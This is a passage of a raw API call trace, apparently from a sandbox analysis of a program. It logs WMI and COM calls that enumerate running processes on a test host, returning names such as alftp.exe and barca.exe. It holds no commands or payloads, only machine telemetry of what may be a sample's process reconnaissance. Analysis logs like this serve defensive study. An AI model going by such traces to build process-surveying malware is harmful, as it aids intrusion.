pToken=0x43e354) returned 0x0 [0279.349] IUnknown:QueryInterface (in: This=0x57041a8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57041a8) returned 0x0 [0279.349] IUnknown:AddRef (This=0x57041a8) returned 0x4 [0279.349] IUnknown:Release (This=0x57041a8) returned 0x3 [0279.349] IUnknown:Release (This=0x57041a8) returned 0x2 [0279.349] CoTaskMemFree (pv=0x56fc278) [0279.350] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.350] IUnknown:AddRef (This=0x57041a8) returned 0x3 [0279.350] IWbemClassObject:Get (in: This=0x57041a8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.350] IWbemClassObject:Get (in: This=0x57041a8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.350] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"") returned 0x66 [0279.351] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"") returned 0x66 [0279.351] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.351] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.351] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.351] IUnknown:Release (This=0x500344) returned 0x1 [0279.359] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc278) returned 0x0 [0279.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc278, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.360] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc278, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57026d0) returned 0x0 [0279.360] WbemDefPath:IUnknown:Release (This=0x56fc278) returned 0x0 [0279.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x57026d0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57026d0) returned 0x0 [0279.360] WbemDefPath:IUnknown:QueryInterface (in: This=0x57026d0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.361] WbemDefPath:IUnknown:AddRef (This=0x57026d0) returned 0x3 [0279.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x57026d0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x57026d0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.361] WbemDefPath:IUnknown:QueryInterface (in: This=0x57026d0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc288) returned 0x0 [0279.361] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc288, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.361] WbemDefPath:IUnknown:Release (This=0x56fc288) returned 0x3 [0279.361] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.362] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.362] WbemDefPath:IUnknown:QueryInterface (in: This=0x57026d0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.362] WbemDefPath:IUnknown:Release (This=0x57026d0) returned 0x2 [0279.362] WbemDefPath:IUnknown:Release (This=0x57026d0) returned 0x1 [0279.362] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.362] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.362] WbemDefPath:IUnknown:QueryInterface (in: This=0x57026d0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57026d0) returned 0x0 [0279.362] WbemDefPath:IUnknown:AddRef (This=0x57026d0) returned 0x3 [0279.362] WbemDefPath:IUnknown:Release (This=0x57026d0) returned 0x2 [0279.362] WbemDefPath:IWbemPath:SetText (This=0x57026d0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"") returned 0x0 [0279.362] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.362] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.363] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.363] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.363] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.363] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.363] IWbemClassObject:Get (in: This=0x57041a8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c8730*=0, plFlavor=0x27c8734*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x27c8730*=8, plFlavor=0x27c8734*=0) returned 0x0 [0279.363] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0279.363] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0279.363] IWbemClassObject:Get (in: This=0x57041a8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c8730*=8, plFlavor=0x27c8734*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x27c8730*=8, plFlavor=0x27c8734*=0) returned 0x0 [0279.363] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0279.363] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0279.363] CoTaskMemAlloc (cb=0x4) returned 0x56fc2b8 [0279.364] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc2b8, puReturned=0x27bb39c | out: apObjects=0x56fc2b8*=0x5704340, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.365] IUnknown:QueryInterface (in: This=0x5704340, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5704340) returned 0x0 [0279.365] IUnknown:QueryInterface (in: This=0x5704340, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.365] IUnknown:QueryInterface (in: This=0x5704340, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.365] IUnknown:AddRef (This=0x5704340) returned 0x3 [0279.365] IUnknown:QueryInterface (in: This=0x5704340, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.365] IUnknown:QueryInterface (in: This=0x5704340, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.365] IUnknown:QueryInterface (in: This=0x5704340, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5704344) returned 0x0 [0279.365] IMarshal:GetUnmarshalClass (in: This=0x5704344, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.366] IUnknown:Release (This=0x5704344) returned 0x3 [0279.366] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.366] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.366] IUnknown:QueryInterface (in: This=0x5704340, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.366] IUnknown:Release (This=0x5704340) returned 0x2 [0279.366] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.366] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.366] IUnknown:QueryInterface (in: This=0x5704340, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5704340) returned 0x0 [0279.366] IUnknown:AddRef (This=0x5704340) returned 0x4 [0279.366] IUnknown:Release (This=0x5704340) returned 0x3 [0279.366] IUnknown:Release (This=0x5704340) returned 0x2 [0279.366] CoTaskMemFree (pv=0x56fc2b8) [0279.366] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.366] IUnknown:AddRef (This=0x5704340) returned 0x3 [0279.366] IWbemClassObject:Get (in: This=0x5704340, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.367] IWbemClassObject:Get (in: This=0x5704340, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.367] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"") returned 0x66 [0279.367] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"") returned 0x66 [0279.367] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.367] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.367] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.367] IUnknown:Release (This=0x500344) returned 0x1 [0279.368] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc2b8) returned 0x0 [0279.368] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc2b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.368] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc2b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57027b0) returned 0x0 [0279.368] WbemDefPath:IUnknown:Release (This=0x56fc2b8) returned 0x0 [0279.369] WbemDefPath:IUnknown:QueryInterface (in: This=0x57027b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57027b0) returned 0x0 [0279.369] WbemDefPath:IUnknown:QueryInterface (in: This=0x57027b0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.369] WbemDefPath:IUnknown:AddRef (This=0x57027b0) returned 0x3 [0279.369] WbemDefPath:IUnknown:QueryInterface (in: This=0x57027b0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.369] WbemDefPath:IUnknown:QueryInterface (in: This=0x57027b0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.369] WbemDefPath:IUnknown:QueryInterface (in: This=0x57027b0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc2c8) returned 0x0 [0279.369] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc2c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.369] WbemDefPath:IUnknown:Release (This=0x56fc2c8) returned 0x3 [0279.369] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x57027b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.370] WbemDefPath:IUnknown:Release (This=0x57027b0) returned 0x2 [0279.370] WbemDefPath:IUnknown:Release (This=0x57027b0) returned 0x1 [0279.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x57027b0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57027b0) returned 0x0 [0279.370] WbemDefPath:IUnknown:AddRef (This=0x57027b0) returned 0x3 [0279.370] WbemDefPath:IUnknown:Release (This=0x57027b0) returned 0x2 [0279.370] WbemDefPath:IWbemPath:SetText (This=0x57027b0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"") returned 0x0 [0279.370] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.370] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.371] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.371] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.371] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.371] IWbemClassObject:Get (in: This=0x5704340, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c8f94*=0, plFlavor=0x27c8f98*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x27c8f94*=8, plFlavor=0x27c8f98*=0) returned 0x0 [0279.371] SysStringByteLen (bstr="barca.exe") returned 0x12 [0279.371] SysStringByteLen (bstr="barca.exe") returned 0x12 [0279.371] IWbemClassObject:Get (in: This=0x5704340, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c8f94*=8, plFlavor=0x27c8f98*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x27c8f94*=8, plFlavor=0x27c8f98*=0) returned 0x0 [0279.371] SysStringByteLen (bstr="barca.exe") returned 0x12 [0279.371] SysStringByteLen (bstr="barca.exe") returned 0x12 [0279.371] CoTaskMemAlloc (cb=0x4) returned 0x56fc2f8 [0279.371] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc2f8, puReturned=0x27bb39c | out: apObjects=0x56fc2f8*=0x57044d8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.372] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57044d8) returned 0x0 [0279.372] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.372] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.373] IUnknown:AddRef (This=0x57044d8) returned 0x3 [0279.373] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.373] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.373] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57044dc) returned 0x0 [0279.373] IMarshal:GetUnmarshalClass (in: This=0x57044dc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, 